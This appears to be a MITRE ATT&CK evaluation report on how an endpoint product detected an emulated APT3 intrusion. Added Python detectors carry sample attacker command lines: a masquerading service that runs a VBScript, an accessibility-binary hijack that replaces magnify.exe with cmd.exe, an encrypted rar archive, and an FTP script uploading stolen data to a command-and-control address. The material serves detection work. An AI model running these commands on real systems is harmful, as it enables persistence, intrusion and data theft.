Telemetry from CodeRed showed sc.exe execution to remotely create the AdobeUpdater service with a binPath set to run cmd.exe with an argument to execute update.vbs on Creeper (tainted by parent alert on PowerShell script with suspicious content). Telemetry from Creeper showed the registry keys that were changed to add the new service.
Specific Behavior
  
A Specific Behavior alert was generated for the suspicious service registration of AdobeUpdater.
Telemetry from CodeRed showing execution sequence of sc.exe AdobeUpdater remote service creation
Parent alert for PowerShell script with suspicious content tainting powershell.exe on CodeRed (alert was generated on many PowerShell script executions throughout the day, specific instance of this procedure not shown in this alert)
Telemetry showing AdobeUpdater service registry information that was changed on Creeper
Specific Behavior alert on suspicious service registration on Creeper
Masquerading
(T1036)
Telemetry (Tainted)
  
 
Telemetry from CodeRed showed the sc.exe service creation command for the AdobeUpdater service with a binPath set to run update.vbs with cmd.exe on startup on Creeper (tainted by parent alert on PowerShell script with suspicious content). Telemetry also showed the sc.exe command that set the service description, but a screenshot was not available. An analyst can use the service name and description together with the script-launching binPath to determine that AdobeUpdater is masquerading as a legitimate service.
Telemetry showing execution sequence of sc.exe AdobeUpdater remote service creation
Parent alert for PowerShell script with suspicious content tainting powershell.exe on CodeRed (alert was generated on many PowerShell script executions throughout the day, specific instance of this procedure not shown in this alert)
16.J.1
Empire: 'sc qc' via PowerShell to remotely enumerate a specific service on Creeper (10.0.0.4)
System Service Discovery
(T1007)
Telemetry (Tainted)
  
 
Telemetry from CodeRed showed sc.exe remote service query on Creeper for the AdobeUpdater service (tainted by parent alert on PowerShell script with suspicious content).
Telemetry from CodeRed showing execution sequence of sc.exe service query for AdobeUpdater on Creeper
Parent alert for PowerShell script with suspicious content tainting powershell.exe on CodeRed (alert was generated on many PowerShell script executions throughout the day, specific instance of this procedure not shown in this alert)
16.K.1
Empire: 'type' via PowerShell to remotely enumerate a specific file (update.vbs) on Creeper (10.0.0.4)
File and Directory Discovery
(T1083)
None
  
No detection capability demonstrated for this procedure.
16.L.1
Empire: 'sc start' via PowerShell to remotely launch a specific service on Creeper (10.0.0.4)
Service Execution
(T1035)
Telemetry (Tainted)
  
 
Telemetry from CodeRed showed the sc.exe remote service start to execute the AdobeUpdater service on Creeper (tainted by parent alert on PowerShell script with suspicious content). Telemetry from Creeper showed the execution sequence of Empire and command and control connections.
Specific Behavior
  
A Specific Behavior alert was generated for a successful AdobeUpdater remote service execution attempt on Creeper.
Telemetry from CodeRed showing execution sequence of sc.exe service start for AdobeUpdater on Creeper
Parent alert for PowerShell script with suspicious content tainting powershell.exe on CodeRed (alert was generated on many PowerShell script executions throughout the day, specific instance of this procedure not shown in this alert)
Telemetry showing service execution on Creeper and new Empire connection to www.freegoogleadsenseinfo.com (C2 domain) (C2 alert rule for BORON domain was added by the vendor earlier in Step 11)
Specific Behavior alert showing successful remote AdobeUpdater service execution attempt from CodeRed to Creeper
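The sc.exe sequence above (16.H.1 query, 16.I.1 create with a binPath that runs cmd.exe against update.vbs, 16.J.1 qc, 16.L.1 start) is the kind of command-line chain a detection can key on directly, whether or not a parent PowerShell alert is present to taint it. The Python below is an added example, not code from MITRE's evaluation or from the vendor's product: it parses sc.exe command lines out of constructed process-creation records, flags service creation whose binPath launches a script host or script file, and correlates a later start of the same service on the same target. The record fields, hostnames and the AdobeUpdater command lines are assumptions made for illustration.

```python
"""Flag sc.exe service creation whose binPath runs a script host, and a later start of that service.
Added illustration for steps 16.H.1 to 16.L.1, not MITRE or vendor code; records below are constructed."""
import re
from dataclasses import dataclass, field
from typing import Optional

SCRIPT_HOSTS = {"cmd.exe", "wscript.exe", "cscript.exe", "powershell.exe", "mshta.exe"}
SCRIPT_EXTS = (".vbs", ".js", ".bat", ".cmd", ".ps1")
TOKEN_RE = re.compile(r'"[^"]*"|\S+')   # a double-quoted run or a bare word

def tokenize(cmdline: str) -> list:
    # Quotes are dropped from the value, so an unquoted path with spaces splits; script
    # arguments are still caught below because every token is checked.
    return [t.strip('"') for t in TOKEN_RE.findall(cmdline)]

def image_name(path: str) -> str:
    """Last path component, lower-cased; accepts both \\ and / separators."""
    return re.split(r"[\\/]", path)[-1].lower()

@dataclass
class ScCommand:
    target: Optional[str]        # host from a leading \\host argument, None when local
    verb: str                    # query, create, qc, start, ...
    service: Optional[str]
    options: dict = field(default_factory=dict)

def parse_sc(cmdline: str) -> Optional[ScCommand]:
    """Parse 'sc [\\\\host] <verb> [service] [opt= value ...]' the way sc.exe accepts it."""
    toks = tokenize(cmdline)
    if not toks or image_name(toks[0]) not in ("sc.exe", "sc"):
        return None
    i, target = 1, None
    if i < len(toks) and toks[i].startswith("\\\\"):
        target, i = toks[i][2:].lower(), i + 1
    if i >= len(toks):
        return None
    verb, i = toks[i].lower(), i + 1
    service = toks[i] if i < len(toks) else None
    opts, i = {}, i + 1
    while i < len(toks):
        tok = toks[i]
        if tok.endswith("=") and i + 1 < len(toks):   # sc.exe syntax: "binPath= value"
            opts[tok[:-1].lower()], i = toks[i + 1], i + 2
        elif "=" in tok:                               # tolerate "binPath=value"
            key, val = tok.split("=", 1)
            opts[key.lower()], i = val, i + 1
        else:
            i += 1
    return ScCommand(target, verb, service, opts)

def suspicious_binpath(binpath: str) -> Optional[str]:
    """Reason string when the service image is a script host or a script, else None."""
    toks = tokenize(binpath)
    if not toks:
        return None
    image = image_name(toks[0])
    if image in SCRIPT_HOSTS:
        return f"service image is script host {image}"
    if image.endswith(SCRIPT_EXTS):
        return f"service image is script file {image}"
    for arg in toks[1:]:
        if arg.lower().endswith(SCRIPT_EXTS):
            return f"service arguments reference script {image_name(arg)}"
    return None

@dataclass
class Finding:
    host: str        # where sc.exe ran
    target: str      # machine whose service control manager was changed
    service: str
    reason: str
    remote: bool

def detect_service_abuse(events: list) -> list:
    """events: dicts with host, parent (image name) and cmdline, in time order."""
    findings, flagged = [], set()
    for ev in events:
        sc = parse_sc(ev["cmdline"])
        if sc is None or sc.service is None:           # e.g. 'sc query' with no service name
            continue
        target = sc.target or ev["host"].lower()
        key = (target, sc.service.lower())
        if sc.verb == "create":
            reason = suspicious_binpath(sc.options.get("binpath", ""))
            if reason:
                flagged.add(key)
                findings.append(Finding(ev["host"], target, sc.service,
                                        f"{reason} (created from {ev['parent']})", sc.target is not None))
        elif sc.verb == "start" and key in flagged:
            findings.append(Finding(ev["host"], target, sc.service,
                                    "start of service previously created with a script binPath",
                                    sc.target is not None))
    return findings

# Constructed records mirroring 16.H.1 to 16.L.1 plus two controls; not vendor telemetry.
SAMPLE_EVENTS = [
    {"host": "codered", "parent": "powershell.exe", "cmdline": r"sc.exe \\creeper query"},
    {"host": "codered", "parent": "powershell.exe",
     "cmdline": r'sc.exe \\creeper create AdobeUpdater binPath= "cmd.exe /c C:\Windows\update.vbs" start= auto'},
    {"host": "codered", "parent": "powershell.exe", "cmdline": r"sc.exe \\creeper qc AdobeUpdater"},
    {"host": "codered", "parent": "powershell.exe", "cmdline": r"sc.exe \\creeper start AdobeUpdater"},
    {"host": "codered", "parent": "cmd.exe",
     "cmdline": r'sc.exe \\fileserver create BackupAgent binPath= "C:\Program Files\Backup\agent.exe" start= auto'},
    {"host": "codered", "parent": "cmd.exe", "cmdline": r'sc.exe create LocalSvc binPath= "cmd.exe /c C:\tmp\x.bat"'},
]

if __name__ == "__main__":
    for f in detect_service_abuse(SAMPLE_EVENTS):
        print(f)
```

Run against the constructed records, the AdobeUpdater create and start on Creeper and the local LocalSvc create are flagged; the BackupAgent create, whose image is a normal executable, is not. The parent image is carried into the reason so that a PowerShell-spawned sc.exe stands out even without a taint alert.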
17.A.1
Empire: 'reg query' via PowerShell to enumerate a specific Registry key associated with terminal services
System Service Discovery
(T1007)
Telemetry (Tainted)
  
 
Telemetry showed reg.exe executing with command-line arguments indicating a check to see if terminal services was enabled (tainted by prior alert on suspicious PowerShell command-line).
Telemetry showing reg.exe query for terminal server setting
Process tree view of suspicious PowerShell command-line alert showing tainted relationship to reg.exe query
Query Registry
(T1012)
Telemetry (Tainted)
  
 
Telemetry showed reg.exe executing with command-line arguments (tainted by prior alert on suspicious PowerShell command line).
Telemetry showing reg.exe executing with command-line arguments
Process tree view of suspicious PowerShell command-line alert showing tainted relationship to reg.exe query
17.B.1
Empire: 'takeown' via PowerShell to obtain ownership of magnify.exe
File Permissions Modification
(T1222)
Telemetry (Tainted)
  
 
Telemetry showed takeown.exe execution taking ownership of magnify.exe, the prerequisite for changing its permissions (tainted by prior alert on suspicious PowerShell command-line).
Telemetry showing takeown.exe execution with magnify.exe in command-line arguments
Process tree view of suspicious PowerShell command-line alert showing tainted relationship to takeown.exe
17.B.2
Empire: 'icacls' via PowerShell to modify the DACL for magnify.exe
File Permissions Modification
(T1222)
Telemetry (Tainted)
  
 
Telemetry showed icacls.exe execution modifying the DACL on magnify.exe to grant access to SYSTEM (tainted by prior alert on suspicious PowerShell command-line).
Telemetry showing icacls.exe execution with magnify.exe in command-line arguments
Process tree view of suspicious PowerShell command-line alert showing tainted relationship to icacls.exe
17.C.1
Empire: 'copy' via PowerShell to overwrite magnify.exe with cmd.exe
Accessibility Features
(T1015)
Telemetry
  
Telemetry showed powershell.exe overwriting magnify.exe with a file whose hash matches cmd.exe. Reputation metadata for that hash shows it has been observed under both file names, confirming that magnify.exe is now a copy of cmd.exe.
Specific Behavior
  
A Specific Behavior alert was generated for the overwrite of magnify.exe, indicating that a sticky keys (accessibility feature) binary hijack for persistence was detected.
Telemetry showing overwrite of magnify.exe
Binary metadata and reputation information showing magnify.exe is cmd.exe due to names observed and common hash
Specific Behavior alert on sticky keys binary hijack for persistence when magnify.exe was overwritten
18.A.1
Empire: 'Get-ChildItem' via PowerShell to enumerate a network shared drive (Wormshare) on Conficker (10.0.0.5)
File and Directory Discovery
(T1083)
Telemetry
  
Telemetry showed the decoded PowerShell script that was executed to recursively search for .vsdx files on Conficker's remote file share.
Query showing .vsdx PowerShell file search script that was executed
18.B.1
Empire: 'copy' via PowerShell staged a file (Shockwave_network.vsdx) from a network shared drive (Wormshare) on Conficker (10.0.0.5) in the Recycle Bin (C:\$Recycle.Bin) on CodeRed (10.0.1.5)
Data Staged
(T1074)
None
  
No detection capability demonstrated for this procedure, though data showed PowerShell Copy-Item cmdlet execution (no information was available about which file was being copied or where the data came from). The vendor states that, at the time of the test, WDATP by default monitors activity around the most commonly used document types (doc, xls, ppt, pdf, etc.).
Execution sequence showing PowerShell Copy-Item cmdlet execution (does not count as a detection)
Data from Network Shared Drive
(T1039)
None
  
No detection capability demonstrated for this procedure, though data showed PowerShell Copy-Item cmdlet execution (no information was available about which file was being copied or where the data came from). The vendor states that, at the time of the test, WDATP by default monitors activity around the most commonly used document types (doc, xls, ppt, pdf, etc.).
Execution sequence showing PowerShell Copy-Item cmdlet execution (does not count as a detection)
19.A.1
Empire: File dropped to disk is a renamed copy of the WinRAR binary
Masquerading
(T1036)
Telemetry
  
Telemetry showed file creation of recycler.exe on CodeRed. Binary reputation and metadata for recycler.exe shows hash and publisher signature as win.rar GmbH indicating the file is actually the WinRAR utility.
Telemetry showing file creation of recycler.exe by powershell.exe showing hash and signer information as win.rar GmbH
Binary reputation and metadata for recycler.exe showing WinRAR information
Remote File Copy
(T1105)
Telemetry (Tainted)
  
 
Telemetry showed powershell.exe creating the recycler.exe file (tainted by an alert on a PowerShell script with a suspicious command-line; that alert was generated by numerous scripts).
Telemetry showing file creation of recycler.exe by powershell.exe showing hash and signer information as win.rar GmbH
Alert description for PowerShell script with a suspicious command-line that tainted this event (alert specific to this instance not shown)
19.B.1
Empire: Executed binary (recycler.exe) created compressed archive (old.rar) of previously collected file
Data Compressed
(T1002)
Telemetry (Tainted)
  
 
Telemetry showed the execution sequence for recycler.exe with WinRAR command-line arguments, including the -hp flag, which compresses the data and encrypts both the archive headers (file names) and the contents (tainted by an alert on a PowerShell script with a suspicious command-line; that alert was generated by numerous scripts).
Telemetry showing execution of recycler.exe with command-line arguments for file encryption and compression
Alert description for PowerShell script with a suspicious command-line that tainted this event (alert specific to this instance not shown)
Data Encrypted
(T1022)
Telemetry (Tainted)
  
 
Telemetry showed the execution sequence for recycler.exe with WinRAR command-line arguments, including the -hp flag, which compresses the data and encrypts both the archive headers (file names) and the contents (tainted by an alert on a PowerShell script with a suspicious command-line; that alert was generated by numerous scripts).
Telemetry showing execution of recycler.exe with command-line arguments for file encryption and compression
Alert description for PowerShell script with a suspicious command-line that tainted this event (alert specific to this instance not shown)
Masquerading
(T1036)
Telemetry (Tainted)
  
 
Telemetry showed the execution sequence for recycler.exe with RAR command-line arguments, including the -hp flag for encryption and compression, indicating that the file was actually WinRAR masquerading under a different name (tainted by an alert on a PowerShell script with a suspicious command-line; that alert was generated by numerous scripts).
Telemetry showing execution of recycler.exe with command-line arguments for file encryption and compression indicating it is WinRAR
Alert description for PowerShell script with a suspicious command-line that tainted this event (alert specific to this instance not shown)
19.C.1
Empire: Sequence of 'echo' commands via PowerShell to populate commands in text file (ftp.txt), which is then executed by FTP to exfil data over a network connection separate from the existing C2 channel
Exfiltration over Alternative Protocol
(T1048)
Telemetry (Tainted)
  
 
Telemetry showed the execution sequence for ftp.exe with command-line arguments including ftp.txt (tainted by an alert on a PowerShell script with a suspicious command-line; that alert was generated by numerous scripts). Telemetry also showed connections to 192.168.0.4 (C2 server) on ports 20 and 21, the FTP data and control channels.
Telemetry showing powershell.exe running ftp.exe and the subsequent connection to 192.168.0.4 (C2 server) on port 20
Telemetry showing powershell.exe running ftp.exe and the subsequent connection to 192.168.0.4 (C2 server) on port 21
Alert description for PowerShell script with a suspicious command-line that tainted this event (alert specific to this instance not shown)
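Steps 19.A.1 through 19.C.1 form one chain: a signed WinRAR binary dropped under another name, an archive created with -hp (which encrypts file names as well as contents), and ftp.exe driven by a script file to push the archive out over a second channel. The Python below is an added example, not vendor or MITRE code, that correlates those three stages from constructed process records plus the contents of the ftp script: it flags a signed image whose OriginalFileName does not match its on-disk name, parses the rar command line for the archive and the encryption switch, and parses the ftp -s: script for the server, login and uploaded paths. The contents of ftp.txt were not published, so the script here is made up to match the description on this page (192.168.0.4, the staged archive); the paths and the archive password are placeholders.

```python
"""Correlate steps 19.A.1 to 19.C.1: renamed WinRAR, -hp encrypted archive, ftp -s: upload.
Added illustration, not MITRE or vendor code; records and the ftp script below are constructed."""
import re
from dataclasses import dataclass
from typing import Optional

TOKEN_RE = re.compile(r'"[^"]*"|\S+')
RAR_ORIGINAL_NAMES = {"winrar.exe", "rar.exe"}  # OriginalFileName values in WinRAR's version resource
FTP_UPLOAD_CMDS = {"put", "send", "mput"}

def tokenize(cmdline: str) -> list:
    return [t.strip('"') for t in TOKEN_RE.findall(cmdline)]

def image_name(path: str) -> str:
    return re.split(r"[\\/]", path)[-1].lower()

@dataclass
class RarCommand:
    command: str                # 'a' add, 'x' extract, ...
    archive: Optional[str]
    inputs: list
    encryption: Optional[str]   # None, 'data' (-p<pw>) or 'headers+data' (-hp<pw>)

def parse_rar(cmdline: str) -> Optional[RarCommand]:
    """Parse 'rar <command> [switches] <archive> [files]'; the image's file name is irrelevant."""
    toks = tokenize(cmdline)
    if len(toks) < 2:
        return None
    command, encryption, positional = toks[1].lower(), None, []
    for tok in toks[2:]:
        if not tok.startswith("-"):
            positional.append(tok)
        elif tok.lower().startswith("-hp"):
            encryption = "headers+data"             # file names inside the archive are hidden too
        elif tok.lower().startswith("-p") and tok.lower() != "-p-" and encryption is None:
            encryption = "data"                     # '-p-' means 'do not prompt', not encrypt
    return RarCommand(command, positional[0] if positional else None, positional[1:], encryption)

@dataclass
class FtpScript:
    server: Optional[str]
    port: int
    user: Optional[str]
    uploads: list

def parse_ftp_script(text: str) -> FtpScript:
    """ftp -s: scripts answer the user and password prompts with the two lines after 'open'."""
    lines = [ln.strip() for ln in text.splitlines() if ln.strip()]
    out, i = FtpScript(None, 21, None, []), 0
    while i < len(lines):
        parts = tokenize(lines[i])
        verb = parts[0].lower()
        if verb == "open" and len(parts) >= 2:
            out.server = parts[1]
            if len(parts) >= 3 and parts[2].isdigit():
                out.port = int(parts[2])
            if i + 2 < len(lines):
                out.user = lines[i + 1]             # lines[i + 2] is the password; not recorded
            i += 3
            continue
        if verb == "user" and len(parts) >= 2:
            out.user = parts[1]
        elif verb in FTP_UPLOAD_CMDS and len(parts) >= 2:
            out.uploads.append(parts[1])
        i += 1
    return out

@dataclass
class Finding:
    stage: str
    detail: str

def detect_exfil_chain(events: list, file_contents: dict) -> list:
    """events: process records (image, original_filename, signer, cmdline) in time order;
    file_contents maps a script path to its text, standing in for a file-content lookup."""
    findings, archives = [], set()
    for ev in events:
        image, orig = image_name(ev["image"]), ev.get("original_filename") or ""
        if orig and orig.lower() != image:          # 19.A.1: signed tool under a new file name
            findings.append(Finding("masquerading", f"{image} has OriginalFileName {orig} (signer {ev.get('signer')})"))
        if orig.lower() in RAR_ORIGINAL_NAMES or image in RAR_ORIGINAL_NAMES:
            rar = parse_rar(ev["cmdline"])
            if rar and rar.command == "a" and rar.archive:
                archives.add(rar.archive.lower())
                if rar.encryption:                  # 19.B.1: Data Compressed plus Data Encrypted
                    findings.append(Finding("encrypted archive", f"{rar.archive} ({rar.encryption}) from {', '.join(rar.inputs)}"))
        if image == "ftp.exe":                       # 19.C.1: scripted FTP outside the C2 channel
            m = re.search(r"-s:(\S+)", ev["cmdline"], re.I)
            if not m:
                continue
            script = parse_ftp_script(file_contents.get(m.group(1), ""))
            for path in script.uploads:
                tag = " [staged archive]" if path.lower() in archives else ""
                findings.append(Finding("ftp upload", f"{path} -> {script.server}:{script.port} as {script.user}{tag}"))
    return findings

# Constructed records; paths and the archive password are placeholders.
SAMPLE_EVENTS = [
    {"image": r"C:\Users\bob\AppData\Local\Temp\recycler.exe", "original_filename": "WinRAR.exe",
     "signer": "win.rar GmbH",
     "cmdline": r"recycler.exe a -hpCorrectHorse C:\$Recycle.Bin\old.rar C:\$Recycle.Bin\Shockwave_network.vsdx"},
    {"image": r"C:\Windows\System32\ftp.exe", "original_filename": "ftp.exe", "signer": "Microsoft Windows",
     "cmdline": r"ftp.exe -s:C:\$Recycle.Bin\ftp.txt"},
]
SAMPLE_FILES = {r"C:\$Recycle.Bin\ftp.txt":
                "open 192.168.0.4\nanonymous\nuser@example.com\nbinary\nput C:\\$Recycle.Bin\\old.rar\nquit\n"}

if __name__ == "__main__":
    for f in detect_exfil_chain(SAMPLE_EVENTS, SAMPLE_FILES):
        print(f)
```

The masquerading check needs only the version resource (OriginalFileName) and signer that the page's binary metadata screenshots show, so it fires at file creation, before any rar or ftp command runs; the upload finding is tagged only when the put path matches an archive the same host created, which is the correlation that turns three low-severity events into one exfiltration chain.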
19.D.1
Empire: 'del C:\"$"Recycle.bin\old.rar'
File Deletion
(T1107)
None
  
No detection capability demonstrated for this procedure, though data showed execution sequence for the PowerShell "Remove-Item" cmdlet (no arguments were available to indicate what was deleted).
Telemetry showing PowerShell executing the Remove-Item cmdlet (does not count as a detection)
19.D.2
Empire: 'del recycler.exe'
File Deletion
(T1107)
None
  
No detection capability demonstrated for this procedure.
20.A.1
magnify.exe previously overwritten by cmd.exe launched through RDP connection made to Creeper (10.0.0.4)
Accessibility Features
(T1015)
Telemetry
  
Telemetry showed execution of magnify.exe from utilman.exe.
Specific Behavior
  
A Specific Behavior alert was generated on a successful sticky keys binary hijack because magnify.exe was executing as cmd.exe.
Telemetry showing sequence of magnify.exe executing from utilman.exe
Specific Behavior alert on sticky keys binary hijack of magnify.exe
Remote Desktop Protocol
(T1076)
Telemetry
  
Telemetry showed creation of a terminal services session on Creeper from CodeRed with corresponding logon by Kmitnick.
Telemetry showing svchost.exe starting terminal service session on Creeper from CodeRed (10.0.1.5)
Telemetry showing Kmitnick RDP logon from CodeRed to Creeper
20.B.1
Executed 'whoami' via cmd persistence mechanism through RDP connection made to Creeper (10.0.0.4)
System Owner / User Discovery
(T1033)
Telemetry (Tainted)
  
 
Telemetry showed whoami.exe executing from magnify.exe (tainted by sticky keys binary hijack alert).
Execution sequence showing whoami.exe executing from magnify.exe
Process tree view of sticky keys binary hijack alert showing tainted relationship to whoami.exe
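Steps 17.B.1 to 17.C.1 (takeown, icacls, then overwriting magnify.exe with cmd.exe) and 20.A.1 to 20.B.1 (magnify.exe launched from utilman.exe over RDP, then whoami) are the write-time and execution-time halves of the same accessibility-feature hijack, and both Specific Behavior alerts on this page rest on the same identity mismatch: a file named magnify.exe whose hash and OriginalFileName belong to cmd.exe. The Python below is an added example serving both passages, not MITRE's or the vendor's logic. Over constructed file-write and process-creation records, with a constructed hash-to-name table standing in for the binary reputation data the vendor shows, it flags the ownership and DACL preparation, the overwrite, the hijacked launch from an accessibility launcher, and any child process of the hijacked binary. Hash values, PIDs, paths and field names are placeholders.

```python
"""Detect the accessibility-feature hijack of steps 17.B.1 to 17.C.1 (prepare and overwrite
magnify.exe) and its use in 20.A.1 to 20.B.1 (magnify.exe from utilman.exe, then whoami.exe).
Added illustration, not MITRE or vendor code; records, hashes and PIDs below are constructed."""
import re
from dataclasses import dataclass
from typing import Optional

# Binaries reachable from the logon screen, the tools used to make them writable, and their launchers.
ACCESSIBILITY_BINARIES = {"sethc.exe", "utilman.exe", "osk.exe", "magnify.exe", "narrator.exe",
                          "displayswitch.exe", "atbroker.exe"}
PREP_TOOLS = {"takeown.exe", "icacls.exe", "cacls.exe"}
ACCESSIBILITY_LAUNCHERS = {"utilman.exe", "winlogon.exe"}
TOKEN_RE = re.compile(r'"[^"]*"|\S+')

def tokenize(cmdline: str) -> list:
    return [t.strip('"') for t in TOKEN_RE.findall(cmdline)]

def image_name(path: str) -> str:
    return re.split(r"[\\/]", path)[-1].lower()

def identity_mismatch(name: str, sha256: Optional[str], original_filename: Optional[str],
                      known_hashes: dict) -> Optional[str]:
    """Reason when the file's hash or version resource says it is a different binary, else None."""
    claimed = known_hashes.get(sha256 or "")
    if claimed and claimed != name:
        return f"hash is known as {claimed}"
    if original_filename and original_filename.lower() != name:
        return f"OriginalFileName is {original_filename}"
    return None

@dataclass
class Finding:
    host: str
    stage: str      # prep, overwrite, hijack, post-hijack
    detail: str

def detect_accessibility_hijack(events: list, known_hashes: dict) -> list:
    """events: file-write and process-creation records in time order;
    known_hashes: sha256 -> canonical image name, standing in for binary reputation data."""
    findings, hijacked = [], set()      # hijacked holds (host, pid) of processes under a hijacked binary
    for ev in events:
        host = ev["host"]
        if ev["type"] == "file":
            name = image_name(ev["path"])
            if name in ACCESSIBILITY_BINARIES:
                why = identity_mismatch(name, ev.get("sha256"), ev.get("original_filename"), known_hashes)
                if why:                                    # 17.C.1: magnify.exe replaced by cmd.exe
                    findings.append(Finding(host, "overwrite",
                                            f"{ev['path']} written by {image_name(ev['writer_image'])}: {why}"))
            continue
        image, parent = image_name(ev["image"]), image_name(ev.get("parent_image", ""))
        if image in PREP_TOOLS:                            # 17.B.1 / 17.B.2: takeown, icacls
            target = next((t for t in tokenize(ev["cmdline"]) if image_name(t) in ACCESSIBILITY_BINARIES), None)
            if target:
                findings.append(Finding(host, "prep", f"{image} on {target}"))
        elif image in ACCESSIBILITY_BINARIES and parent in ACCESSIBILITY_LAUNCHERS:
            why = identity_mismatch(image, ev.get("sha256"), ev.get("original_filename"), known_hashes)
            if why:                                        # 20.A.1: hijacked binary launched by utilman.exe
                hijacked.add((host, ev["pid"]))
                findings.append(Finding(host, "hijack", f"{image} spawned by {parent}: {why}"))
        elif (host, ev.get("ppid")) in hijacked:           # 20.B.1: whoami from the hijacked shell
            hijacked.add((host, ev["pid"]))                # keep following the tree
            findings.append(Finding(host, "post-hijack", f"{image} run from hijacked {parent}: {ev['cmdline']}"))
    return findings

# Constructed data: the hash strings stand in for the real cmd.exe and magnify.exe hashes.
CMD_SHA, MAG_SHA = "a" * 64, "b" * 64
KNOWN_HASHES = {CMD_SHA: "cmd.exe", MAG_SHA: "magnify.exe"}
PS, SYS32 = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", r"C:\Windows\System32"
SAMPLE_EVENTS = [
    {"type": "process", "host": "creeper", "pid": 410, "ppid": 300, "image": SYS32 + r"\takeown.exe",
     "parent_image": PS, "cmdline": r"takeown.exe /f C:\Windows\System32\magnify.exe"},
    {"type": "process", "host": "creeper", "pid": 411, "ppid": 300, "image": SYS32 + r"\icacls.exe",
     "parent_image": PS, "cmdline": r"icacls.exe C:\Windows\System32\magnify.exe /grant SYSTEM:F"},
    {"type": "file", "host": "creeper", "path": SYS32 + r"\magnify.exe", "sha256": CMD_SHA,
     "original_filename": "Cmd.Exe", "writer_image": PS},
    {"type": "process", "host": "creeper", "pid": 520, "ppid": 500, "image": SYS32 + r"\magnify.exe",
     "parent_image": SYS32 + r"\utilman.exe", "cmdline": "magnify.exe", "sha256": CMD_SHA,
     "original_filename": "Cmd.Exe"},
    {"type": "process", "host": "creeper", "pid": 521, "ppid": 520, "image": SYS32 + r"\whoami.exe",
     "parent_image": SYS32 + r"\magnify.exe", "cmdline": "whoami"},
    # control: a genuine magnify.exe started from utilman.exe on another host
    {"type": "process", "host": "nimda", "pid": 700, "ppid": 600, "image": SYS32 + r"\magnify.exe",
     "parent_image": SYS32 + r"\utilman.exe", "cmdline": "magnify.exe", "sha256": MAG_SHA,
     "original_filename": "Magnify.exe"},
]

if __name__ == "__main__":
    for f in detect_accessibility_hijack(SAMPLE_EVENTS, KNOWN_HASHES):
        print(f)
```

The genuine magnify.exe launch on the control host produces nothing because both its hash and its OriginalFileName agree with the file name; the two prep findings are worth keeping even on their own, since takeown or icacls against a System32 accessibility binary has no routine administrative reason.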


Operational Flow

The Operational Flow panel provides the context around when a procedure was executed by showing all steps of the evaluation, including the tactics, techniques and procedures of the executed steps.

Step 1: Initial Compromise

1.A.1 Execution

User Execution, Rundll32, Scripting

i. Legitimate user Debbie clicked and executed malicious self-extracting archive (Resume Viewer.exe) on 10.0.1.6 (Nimda)

1.B.1 Persistence

Registry Run Keys / Startup Folder

i. Previously executed batch file (pdfhelper.cmd) moved a separate batch file (autoupdate.bat) to the Startup folder

1.C.1 Command and Control

Commonly Used Port, Data Encoding, Standard Application Layer Protocol

i. Cobalt Strike: C2 channel established

Step 2: Initial Discovery

2.A.1 Discovery

System Network Configuration Discovery

i. Cobalt Strike: 'ipconfig /all' via cmd

2.A.2 Discovery

System Network Configuration Discovery

i. Cobalt Strike: 'arp -a' via cmd

2.B.1 Discovery

System Owner / User Discovery

i. Cobalt Strike: 'echo' via cmd to enumerate specific environment variables

2.C.1 Discovery

Process Discovery

i. Cobalt Strike: 'ps' (Process status) via Win32 APIs

2.C.2 Discovery

Process Discovery

i. Cobalt Strike: 'tasklist /v' via cmd

2.D.1 Discovery

System Service Discovery

i. Cobalt Strike: 'sc query' via cmd

2.D.2 Discovery

System Service Discovery

i. Cobalt Strike: 'net start' via cmd

2.E.1 Discovery

System Information Discovery

i. Cobalt Strike: 'systeminfo' via cmd

2.E.2 Discovery

System Information Discovery

i. Cobalt Strike: 'net config workstation' via cmd

2.F.1 Discovery

Permission Groups Discovery

i. Cobalt Strike: 'net localgroup administrators' via cmd

2.F.2 Discovery

Permission Groups Discovery

i. Cobalt Strike: 'net localgroup administrators /domain' via cmd

2.F.3 Discovery

Permission Groups Discovery

i. Cobalt Strike: 'net group "Domain Admins" /domain' via cmd

2.G.1 Discovery

Account Discovery

i. Cobalt Strike: 'net user /domain' via cmd

2.G.2 Discovery

Account Discovery

i. Cobalt Strike: 'net user george /domain' via cmd

2.H.1 Discovery

Query Registry

i. Cobalt Strike: 'reg query' via cmd to enumerate a specific Registry key

Step 3: Privilege Escalation

3.A.1 Defense Evasion, Privilege Escalation

Access Token Manipulation, Bypass User Account Control

i. Cobalt Strike: Built-in UAC bypass token duplication capability executed to elevate process integrity level

3.B.1 Discovery

Process Discovery

i. Cobalt Strike: 'ps' (Process status) via Win32 APIs

3.C.1 Defense Evasion, Privilege Escalation

Process Injection

i. Cobalt Strike: Built-in process injection capability executed to inject callback into cmd.exe

Step 4: Discovery for Lateral Movement

4.A.1 Discovery

Remote System Discovery

i. Cobalt Strike: 'net group "Domain Controllers" /domain' via cmd

4.A.2 Discovery

Remote System Discovery

i. Cobalt Strike: 'net group "Domain Computers" /domain' via cmd

4.B.1 Discovery

System Network Configuration Discovery

i. Cobalt Strike: 'netsh advfirewall show allprofiles' via cmd

4.C.1 Discovery

System Network Connections Discovery

i. Cobalt Strike: 'netstat -ano' via cmd

Step 5: Credential Access

5.A.1 Credential Access

Credential Dumping, Process Injection

i. Cobalt Strike: Built-in Mimikatz credential dump capability executed

5.A.2 Credential Access

Credential Dumping, Process Injection

i. Cobalt Strike: Built-in hash dump capability executed

5.B.1 Defense Evasion, Privilege Escalation

Access Token Manipulation

i. Cobalt Strike: Built-in token theft capability executed to change user context to George

Step 6: Lateral Movement

6.A.1 Discovery

Query Registry

i. Cobalt Strike: 'reg query' via cmd to remotely enumerate a specific Registry key on Conficker (10.0.0.5)

6.B.1 Command and Control

Commonly Used Port, Multiband Communication, Standard Application Layer Protocol

i. Cobalt Strike: C2 channel modified

6.C.1 Lateral Movement

Remote Desktop Protocol

i. Cobalt Strike: C2 channel modified to proxy RDP connection to Conficker (10.0.0.5)

Step 7: Persistence

7.A.1 Persistence

Create Account, Graphical User Interface, Account Discovery

i. Added user Jesse to Conficker (10.0.0.5) through RDP connection

7.B.1 Command and Control, Lateral Movement

Remote File Copy

i. Cobalt Strike: Built-in upload capability executed to write a DLL payload (updater.dll) to disk on Nimda (10.0.1.6)

7.C.1 Execution, Persistence, Privilege Escalation

Scheduled Task

i. Cobalt Strike: 'schtasks' via cmd to create scheduled task that executes a DLL payload (updater.dll)

Step 8: Collection

8.A.1 Discovery

File and Directory Discovery

i. Cobalt Strike: 'dir /s /b "\\conficker\wormshare"' via cmd

8.A.2 Discovery

File and Directory Discovery

